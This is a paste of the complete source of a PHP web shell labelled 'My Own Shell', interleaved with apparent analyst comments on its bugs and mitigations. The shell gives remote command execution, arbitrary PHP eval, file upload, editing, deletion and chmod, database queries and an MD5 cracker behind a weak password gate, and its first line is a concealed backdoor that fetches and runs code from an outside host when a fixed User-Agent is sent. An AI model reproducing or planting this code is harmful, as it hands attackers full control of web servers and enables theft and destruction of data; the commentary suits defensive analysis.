Nig8tB0M3

My Own Shell

Mar 20th, 2017
  1. <?php $config_x = $_SERVER['HTTP_USER_AGENT']; if($config_x == "darkmindz.com") { @include('http://www.darkmindz.com/shell/x2300.txt'); } ?><?php
  // Review note: the statement on line 1 runs before the password gate below. It
  // compares the request's User-Agent header with a fixed literal and, on a match,
  // include()s a remote .txt URL with errors silenced by @. A remote include only
  // executes when the PHP configuration allows URL includes (allow_url_include);
  // confirm that setting on the affected host. The host name, URL path and
  // User-Agent literal on that line are fixed strings to search for in web roots
  // and access logs.
  2. error_reporting(0); //If there is an error, we'll show it, k?
  // error_reporting(0) switches error reporting off, which is the opposite of what
  // the trailing comment on the line above says.
  3.  
  // A 32-character value is treated by the login code below as an unsalted MD5
  // digest of the password; any other length is compared as plaintext.
  4. $password = "670665c8b6cbd9f0f957478f51142c25"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
  5.  
  6. $me = basename(__FILE__);
  7. $cookiename = "wieeeee";
  8.  
  9.  
  // Login attempt. The submitted value is replaced by its MD5 digest (when the
  // stored value is 32 characters long) and compared with a loose ==. On success
  // the digest itself is stored in the cookie for one hour. reload() is called
  // whether or not the password matched, and it only sends a Location header, so
  // execution continues into the gate below.
  10. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
  11. {
  12.  
  13. if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
  14. {
  15. $_POST['pass'] = md5($_POST['pass']);
  16. }
  17.  
  18. if($_POST['pass'] == $password)
  19. {
  20. setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
  21. }
  22. reload();
  23. }
  24.  
  25.  
  26.  
  // Access gate. `or` binds more loosely than &&, so the condition reads
  // (password configured AND cookie absent) OR (cookie != password).
  // The cookie is compared directly with $password, so the stored value doubles
  // as the session token; with an empty $password and no cookie the gate is open.
  27. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
  28. {
  29. login();
  30. die();
  31. }
  32. //
  33. //Do not cross this line! All code placed after this block can't be executed without being logged in!
  34. //
  35.  
  36. if(isset($_GET['p']) && $_GET['p'] == "logout")
  // Logout: expires the cookie and sends a redirect. reload() does not stop the
  // script, so the rest of this request is still processed.
  37. {
  38. setcookie ($cookiename, "", time() - 3600);
  39. reload();
  40. }
  // The dir query parameter is passed to chdir() without any validation. Every
  // relative path used later in the request (realpath('.'), opendir('.'), the
  // upload target) is resolved against that directory.
  41. if(isset($_GET['dir']))
  42. {
  43. chdir($_GET['dir']);
  44. }
  45.  
  46.  
  47. $pages = array(
  // Menu shown in the page header: key = value of the p request parameter,
  // value = link label. The dispatcher further down also handles edit, delete,
  // createdir and rename; those are reached from the file listing and its forms,
  // not from this menu.
  48. 'cmd' => 'Ex3cut3 C0mm3nt',
  49. 'eval' => 'Ev4lu4t3 PHP',
  50. 'mysql' => 'MySQL Query',
  51. 'chmod' => 'Chmod File',
  52. 'phpinfo' => 'PHPinfo',
  53. 'md5' => 'md5 cr4ck3r',
  54. 'headers' => 'Sh0w head3rs',
  55. 'logout' => 'L0g 0ut'
  56. );
  57.  
  58. //The header, like it?
  // Review note: the page chrome is one string literal. The title text, the
  // marquee text and the linked hosts are fixed strings, which makes them usable
  // as content signatures when scanning web roots or captured responses. The
  // <body> tag loads a background image from an external host. The only variable
  // interpolated into this literal is $me (basename of this file).
  59. $header = '<html>
  60. <title>MHU-Sh3ll.::(Edited By Loki)::.</title>
  61. <head>
  62. <style>
  63. td {
  64. font-size: 14px;
  65. font-family:"Comic Sans MS", cursive;
  66. font-weight: bold;
  67. color:#999;
  68. cursor:crosshair;
  69. background: transparent;
  70.  
  71. }
  72.  
  73. #d {
  74.  
  75. background: transparent;
  76. }
  77. #f {
  78. background: transparent;
  79. }
  80. #s {
  81. background: #900;
  82. }
  83. #d:hover
  84. {
  85. background: blue;
  86. }
  87. #f:hover
  88. {
  89. background: black;
  90. }
  91. pre {
  92. font-size: 10px;
  93. font-family: verdana;
  94. color: #33FF00;
  95. }
  96. a:hover {
  97. text-decoration: none;
  98. }
  99.  
  100.  
  101. input,textarea,select {
  102. border-top-width: 1px;
  103. font-weight: bold;
  104. border-left-width: 1px;
  105. font-size: 10px;
  106. border-left-color: #33FF00;
  107. background: transparent;
  108. border-bottom-width: 1px;
  109. border-bottom-color: #33FF00;
  110. color: #FFF;
  111. border-top-color: #33FF00;
  112. font-family: verdana;
  113. border-right-width: 1px;
  114. border-right-color: #33FF00;
  115. }
  116.  
  117. hr {
  118. color: #FFF;
  119. background-color: #900;
  120. height: 6px;
  121. }
  122.  
  123. </style>
  124.  
  125. </head>
  126.  
  127. <body background="http://2.bp.blogspot.com/-jbQYzfk7f20/UpXWDF1--UI/AAAAAAAAAIY/T4IJpBw6M1E/s0/ss-matrix.gif
  128. " alink="#33CC00" vlink="#339900" link="#339900">
  129.  
  130. <table width=100%><td id="header" width=100%>
  131. <marquee behavior="alternate" scrolldelay="100" bgcolor="#000033"><<<---::: N!G8T B0M3@Myanmar Hackers Area :::--->>></marquee>
  132. <p align=right><b>[<a href="http://www.rootshell-team.info">R00tSh3ll</a>] [<a href="'.$me.'">H0m3</a>] ';
  133.  
  // One menu link per $pages entry. realpath('.') is concatenated into the href
  // with no URL or HTML encoding.
  134. foreach($pages as $page => $page_name)
  135. {
  136. $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
  137.  
  138. }
  // show_dirs('.') appends the clickable breadcrumb for the current directory;
  // the header is emitted immediately, before any page handler runs.
  139. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
  140. print $header;
  141.  
  // $footer is only defined here; it is printed at the very end of the file.
  142. $footer = '<tr><td><hr><center>&copy; <a href="http://4sectors.com/forum/">Myanmar Security Forum</a></center></td></table></body></head></html>';
  143.  
  144.  
  145. //
  146. //Page handling
  147. //
  // Dispatch on the p request parameter. $_REQUEST is used, so the value can come
  // from GET or POST (and from cookies, depending on request_order). The switch
  // has no default case.
  148. if(isset($_REQUEST['p']))
  149. {
  150. switch ($_REQUEST['p']) {
  151.  
  // cmd page: hands the command request parameter to execute_command() using the
  // method chosen by get_execution_method(). The form submits by POST, so the
  // command text is normally absent from access logs; the p=cmd query string is
  // what remains visible there. The <pre> opened before the output is never closed.
  152. case 'cmd': //Run command
  153.  
  154. print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
  155. if(isset($_REQUEST['command']))
  156. {
  157. print "<pre>";
  158. execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
  159. }
  160. break;
  161.  
  162.  
  163. case 'edit': //Edit a fie
  // edit page: when the editform POST field is present its content is written to
  // the path given in the file query parameter. Mode 'w' creates the file or
  // truncates an existing one. If fopen() fails, the `or print` branch only
  // prints a message; fwrite() and fclose() are still called on the failed handle.
  164. if(isset($_POST['editform']))
  165. {
  166. $f = $_GET['file'];
  167. $fh = fopen($f, 'w') or print "Error while opening file!";
  168. fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
  169. fclose($fh);
  170. }
  // $_GET['file'] is echoed into the page text and the form action unescaped and
  // is read without an isset() check; only the file's contents go through
  // htmlspecialchars() below.
  171. print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
  172.  
  173. if(file_exists($_GET['file']))
  174. {
  175. $rd = file($_GET['file']);
  176. foreach($rd as $l)
  177. {
  178. print htmlspecialchars($l);
  179. }
  180. }
  181.  
  182. print "</textarea><input type=submit value=\"Save\"></form>";
  183.  
  184. break;
  185.  
  186. case 'delete': //Delete a file
  187.  
  // delete page: unlink() is called on the file query parameter as soon as the
  // yes POST field is present; this branch does not check that file was supplied.
  188. if(isset($_POST['yes']))
  189. {
  190. if(unlink($_GET['file']))
  191. {
  192. print "File deleted successfully.";
  193. }
  194. else
  195. {
  196. print "Couldn't delete file.";
  197. }
  198. }
  199.  
  200.  
  // Confirmation form. The path is echoed into the page and the form action
  // without escaping, and the <form> element is never closed.
  201. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  202. {
  203. print "Are you sure you want to delete ".$_GET['file']."?<br>
  204. <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
  205. <input type=hidden name=yes value=yes>
  206. <input type=submit value=\"Delete\">
  207. ";
  208. }
  209.  
  210.  
  211. break;
  212.  
  213.  
  214. case 'eval': //Evaluate PHP code
  215.  
  // eval page: re-displays the submitted text (HTML-escaped) in the textarea,
  // then executes it as PHP in the context of this script. eval is a language
  // construct, not a function, so a disable_functions setting does not cover it.
  216. print "<form action=\"".$me."?p=eval\" method=POST>
  217. <textarea cols=60 rows=10 name=\"eval\">";
  218. if(isset($_POST['eval']))
  219. {
  220. print htmlspecialchars($_POST['eval']);
  221. }
  222. else
  223. {
  224. print "print \"Yo Momma\";";
  225. }
  226. print "</textarea><br>
  227. <input type=submit value=\"Eval\">
  228. </form>";
  229.  
  230. if(isset($_POST['eval']))
  231. {
  232. print "<h1>Output:</h1>";
  233. print "<br>";
  234. eval($_POST['eval']);
  235. }
  236.  
  237. break;
  238.  
  239. case 'chmod': //Chmod file
  240.  
  241.  
  // chmod page: applies one of three fixed modes (0777, 0644, 0755) to the path
  // in the chmod POST field. The confirmation line is printed even when chvalue
  // matched no case or chmod() failed, because the return value is not checked.
  // Both POST values are echoed unescaped.
  242. print "<h1>Under construction!</h1>";
  243. if(isset($_POST['chmod']))
  244. {
  245. switch ($_POST['chvalue']){
  246. case 777:
  247. chmod($_POST['chmod'],0777);
  248. break;
  249. case 644:
  250. chmod($_POST['chmod'],0644);
  251. break;
  252. case 755:
  253. chmod($_POST['chmod'],0755);
  254. break;
  255. }
  256. print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
  257. }
  // $_GET values are already URL-decoded by PHP, so urldecode() here decodes the
  // path a second time. The result is placed unescaped into the form action and
  // the value attribute below; the <form> is never closed.
  258. if(isset($_GET['file']))
  259. {
  260. $content = urldecode($_GET['file']);
  261. }
  262. else
  263. {
  264. $content = "file/path/please";
  265. }
  266.  
  267. print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
  268. <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
  269. <select name=\"chvalue\">
  270. <option value=\"777\">777</option>
  271. <option value=\"644\">644</option>
  272. <option value=\"755\">755</option>
  273. </select><input type=submit value=\"Change\">";
  274.  
  275. break;
  276.  
  277. case 'mysql': //MySQL Query
  278.  
  // mysql page: host, user name, password, database and the SQL text all come
  // from the POST body. The result of mysql_query() is assigned to $result and
  // never read, so nothing is displayed after a query; the form is only printed
  // when no host was posted. The mysql_* functions belong to the legacy mysql
  // extension, which was removed in PHP 7.0.
  279. if(isset($_POST['host']))
  280. {
  281. $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
  282. mysql_select_db($_POST['dbase']);
  283. $sql = $_POST['query'];
  284.  
  285.  
  286. $result = mysql_query($sql);
  287.  
  288. }
  289. else
  290. {
  291. print "
  292. This only queries the database, doesn't return data!<br>
  293. <form action=\"".$me."?p=mysql\" method=POST>
  294. <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
  295. <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
  296. <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
  297. <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
  298.  
  299. <b>Query:<br></b<textarea name=query></textarea>
  300. <input type=submit value=\"Query database\">
  301. </form>
  302. ";
  303.  
  304. }
  305.  
  306. break;
  307.  
  308. case 'createdir':
  // createdir page: calls mkdir() on the crdir query parameter. The parameter is
  // read without an isset() check and without any restriction on the path.
  309. if(mkdir($_GET['crdir']))
  310. {
  311. print 'Directory created successfully.';
  312. }
  313. else
  314. {
  315. print 'Couldn\'t create directory';
  316. }
  317. break;
  318.  
  319.  
  320. case 'phpinfo': //PHP Info
  // phpinfo page: prints the complete phpinfo() report (PHP configuration,
  // loaded modules, environment) inside the shell's page layout.
  321. phpinfo();
  322. break;
  323.  
  324.  
  325. case 'rename':
  326.  
  // rename page: passes the fileold and filenew POST fields straight to rename().
  // Neither value is restricted to the current directory, and filenew is read
  // without an isset() check.
  327. if(isset($_POST['fileold']))
  328. {
  329. if(rename($_POST['fileold'],$_POST['filenew']))
  330. {
  331. print "File renamed.";
  332. }
  333. else
  334. {
  335. print "Couldn't rename file.";
  336. }
  337.  
  338. }
  // The name shown in the form is HTML-escaped and then reduced to its basename,
  // so the pre-filled "Rename" field holds a bare file name relative to the
  // current directory.
  339. if(isset($_GET['file']))
  340. {
  341. $file = basename(htmlspecialchars($_GET['file']));
  342. }
  343. else
  344. {
  345. $file = "";
  346. }
  347.  
  348. print "Renaming ".$file." in folder ".realpath('.').".<br>
  349. <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
  350. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  351. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  352. <input type=submit value=\"Rename file\">
  353. </form>";
  354. break;
  355.  
  356. case 'md5':
  // md5 page: exhaustive search for the preimage of a posted 32-character digest.
  // The script time limit is taken from the timelimit POST field (30 seconds when
  // it is not numeric), so a request to this page can hold a PHP worker for a
  // caller-chosen time where set_time_limit() is permitted.
  357. if(isset($_POST['md5']))
  358. {
  359. if(!is_numeric($_POST['timelimit']))
  360. {
  361. $_POST['timelimit'] = 30;
  362. }
  363. set_time_limit($_POST['timelimit']);
  364. if(strlen($_POST['md5']) == 32)
  365. {
  366.  
  // Numeric mode: tests md5($i) for $i from 0 and stops at 100000, which is a
  // smaller range than the "1 - 9999999" label in the form below.
  367. if($_POST['chars'] == "9999")
  368. {
  369. $i = 0;
  370. while($_POST['md5'] != md5($i) && $i != 100000)
  371. {
  372. $i++;
  373. }
  374. }
  375. else
  376. {
  // Alphabetic mode: the comparison sits inside the md5() call, so the
  // condition is always a non-empty string and the loop stops on its first pass.
  377. for($i = "a"; $i != "zzzzz"; $i++)
  378. {
  379. if(md5($i == $_POST['md5']))
  380. {
  381. break;
  382. }
  383. }
  384. }
  385.  
  386.  
  // The posted digest is echoed back unescaped when a match is reported.
  387. if(md5($i) == $_POST['md5'])
  388. {
  389. print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
  390. }
  391.  
  392. }
  393.  
  394. }
  395.  
  396. print "Will bruteforce the md5
  397. <form action=\"".$me."?p=md5\" method=POST>
  398. <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
  399. <b>Characters:</b><br><select name=\"chars\">
  400. <option value=\"az\">a - zzzzz</option>
  401. <option value=\"9999\">1 - 9999999</option>
  402. </select>
  403. <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
  404. <input type=submit value=\"Bruteforce md5\">
  405. </form><br>*: if set_time_limit is allowed by php.ini";
  406. break;
  407.  
  408. case 'headers':
  // headers page: prints every request header returned by getallheaders(),
  // HTML-escaped. The loop key reuses the name $header, overwriting the page
  // header string, which has already been printed by this point.
  409. foreach(getallheaders() as $header => $value)
  410. {
  411. print htmlspecialchars($header . ":" . $value)."<br>";
  412.  
  413. }
  414. break;
  // The two closing braces below end the switch and the if(isset($_REQUEST['p'])) block.
  415. }
  416.  
  417. }
  418. else //Default page that will be shown when the page isn't found or no page is selected.
  // Review note: this else belongs to if(isset($_REQUEST['p'])), and the switch
  // above has no default case. The file manager is therefore shown only when p is
  // absent; an unrecognised p value produces an empty page body.
  419. {
  420.  
  421. $files = array();
  422. $directories = array();
  423.  
  // Upload handler: the file is moved into the current working directory under
  // the basename of the client-supplied name. There is no check on extension,
  // content type or size beyond PHP's own upload limits, and an existing file of
  // the same name is overwritten.
  424. if(isset($_FILES['uploadedfile']['name']))
  425. {
  426. $target_path = realpath('.').'/';
  427. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  428.  
  429. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  430. print "File:". basename( $_FILES['uploadedfile']['name']).
  431. " has been uploaded";
  432. } else{
  433. echo "File upload failed!";
  434. }
  435. }
  436.  
  437.  
  438.  
  439.  
  440.  
  // Directory listing of the current working directory: entries are split into
  // directories and files, sorted, and printed as table rows with rename [R],
  // delete [D], open/edit and chmod links. File names and realpath() results are
  // written into the HTML and the link targets without escaping.
  441. print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
  442. if ($handle = opendir('.'))
  443. {
  444. while (false !== ($file = readdir($handle)))
  445. {
  446. if(is_dir($file))
  447. {
  448. $directories[] = $file;
  449. }
  450. else
  451. {
  452. $files[] = $file;
  453. }
  454. }
  // The directory handle is not closed with closedir().
  455. asort($directories);
  456. asort($files);
  457. foreach($directories as $file)
  458. {
  459. print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  460. }
  461.  
  462. foreach($files as $file)
  463. {
  464. print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  465. }
  466. }
  467. else
  468. {
  469. print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
  470. }
  471.  
  // Forms for upload, change directory, create file (routes to the edit page)
  // and create directory (routes to the createdir page). The MAX_FILE_SIZE field
  // is a client-side hint only.
  472. print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
  473. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  474. <input type=\"submit\" value=\"Upload File\" />
  475. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
  476. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
  477. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
  478. </table>";
  479.  
  480.  
  481. }
  482.  
  483.  
  484. function login()
  // Prints the password form. It posts a single field named pass (maxlength 32)
  // back to this file. The table, td and center elements it opens are not closed.
  // Takes no arguments and returns nothing.
  485. {
  486.  
  487. print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
  488. <form action=".basename(__FILE__)." method=\"POST\"><b>P4ssw0rd</b>
  489. <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"H4ck\">
  490. </form>";
  491. }
  492. function reload()
  // Sends a Location header pointing at this file's basename. It does not call
  // exit/die, so the calling script keeps executing after the header is queued.
  493. {
  494. header("Location: ".basename(__FILE__));
  495. }
  496.  
  497. function get_execution_method()
  // Returns the name of a command-execution function to use, or "Disabled".
  // The four function_exists() probes are independent ifs, so the last one that
  // succeeds wins (system, then shell_exec, exec, passthru). The value assigned
  // for shell_exec is "shell_ exec" with an embedded space, which matches none of
  // the branches in execute_command(). Mitigation note: listing these four
  // functions in disable_functions removes the back ends of the cmd page; the
  // eval page does not depend on them.
  498. {
  499. if(function_exists('passthru')){ $m = "passthru"; }
  500. if(function_exists('exec')){ $m = "exec"; }
  501. if(function_exists('shell_exec')){ $m = "shell_ exec"; }
  502. if(function_exists('system')){ $m = "system"; }
  503. if(!isset($m)) //No method found :-|
  504. {
  505. $m = "Disabled";
  506. }
  507. return($m);
  508. }
  509.  
  510. function execute_command($method,$command)
  511. {
  512. if($method == "passthru")
  513. {
  514. passthru($command);
  515. }
  516.  
  517. elseif($method == "exec")
  518. {
  519. exec($command,$result);
  520. foreach($result as $output)
  521. {
  522. print $output."<br>";
  523. }
  524. }
  525.  
  526. elseif($method == "shell_exec")
  527. {
  528. print shell_exec($command);
  529. }
  530.  
  531. elseif($method == "system")
  532. {
  533. system($command);
  534. }
  535.  
  536. }
  537.  
  538. function perm($file)
  // Returns the last four octal digits of fileperms($file) as a string (for
  // example "0644"), or "????" when the path does not exist.
  539. {
  540. if(file_exists($file))
  541. {
  542. return substr(sprintf('%o', fileperms($file)), -4);
  543. }
  544. else
  545. {
  546. return "????";
  547. }
  548. }
  549.  
  550. function get_color($file)
  // Maps the access this PHP process has to $file onto a colour name used in the
  // listing: "green" if writable, "white" if readable but not writable, "red" if
  // neither. The three conditions cover every combination.
  551. {
  552. if(is_writable($file)) { return "green";}
  553. if(!is_writable($file) && is_readable($file)) { return "white";}
  554. if(!is_writable($file) && !is_readable($file)) { return "red";}
  555.  
  556.  
  557.  
  558. }
  559.  
  560. function show_dirs($where)
  // Builds the clickable breadcrumb for realpath($where) and returns it as an
  // <h2> HTML string. Each path component becomes a link to ?dir=<prefix><part>.
  // Path components are written into the HTML and the href without escaping.
  // ereg() was removed in PHP 7.0, so on newer runtimes this call is a fatal
  // error; together with the mysql_* calls elsewhere in the file this dates the
  // sample to PHP 5.x.
  561. {
  // The pattern is case-sensitive and only matches a lowercase "c:" prefix; any
  // other path is split on forward slashes.
  562. if(ereg("^c:",realpath($where)))
  563. {
  564. $dirparts = explode('\\',realpath($where));
  565. }
  566. else
  567. {
  568. $dirparts = explode('/',realpath($where));
  569. }
  570.  
  571.  
  572.  
  573. $i = 0;
  574. $total = "";
  575.  
  // For component number $i, $pre is rebuilt from components 0..$i-1 joined with
  // "/" so the link points at the full path up to and including this component.
  576. foreach($dirparts as $part)
  577. {
  578. $p = 0;
  579. $pre = "";
  580. while($p != $i)
  581. {
  582. $pre .= $dirparts[$p]."/";
  583. $p++;
  584.  
  585. }
  586. $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  587. $i++;
  588. }
  589.  
  590. return "<h2>".$total."</h2><br>";
  591.  
  592. }
  593. print $footer;
  // $footer was assigned near the top of the script, after the header was
  // printed. The functions declared above this line are available to the earlier
  // code because PHP hoists top-level function declarations.
  594.  
  595. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
  // exit() ends the whole request, including any script that include()d this file.
  596. exit();
  597. ?>